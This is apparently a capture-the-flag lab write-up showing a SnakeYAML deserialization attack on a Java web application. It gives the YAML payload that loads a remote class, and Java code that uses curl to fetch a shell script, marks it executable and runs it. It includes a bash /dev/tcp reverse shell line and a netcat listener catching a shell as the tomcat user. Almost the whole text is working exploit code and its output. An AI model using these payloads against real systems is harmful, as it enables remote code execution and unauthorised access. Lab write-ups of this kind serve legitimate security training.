3 yaml deserialization exploit

Just searching on google for YAML Exploit:

https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858 https://github.com/mbechler/marshalsec

Testing

yaml:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.15/"]
  ]]
]

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [04/May/2021 22:07:49] code 404, message File not found
10.10.10.227 - - [04/May/2021 22:07:49] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 404 -

https://github.com/artsploit/yaml-payload

# shell.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'

# changes to code
public AwesomeScriptEngineFactory() throws Exception {
	try {
		Runtime.getRuntime().exec("curl http://10.10.14.15/shell.sh -o /tmp/shell.sh");
		Runtime.getRuntime().exec("chmod +x /tmp/shell.sh");
		Runtime.getRuntime().exec("./tmp/shell.sh");
	} catch (IOException e) {
		e.printStackTrace();
	}
}

10.10.10.227 - - [04/May/2021 22:54:04] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /artsploit/AwesomeScriptEngineFactory.class HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /shell.sh HTTP/1.1" 200 -

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.227] 34808
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
whoami;id
whoami;id
tomcat
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

Last updated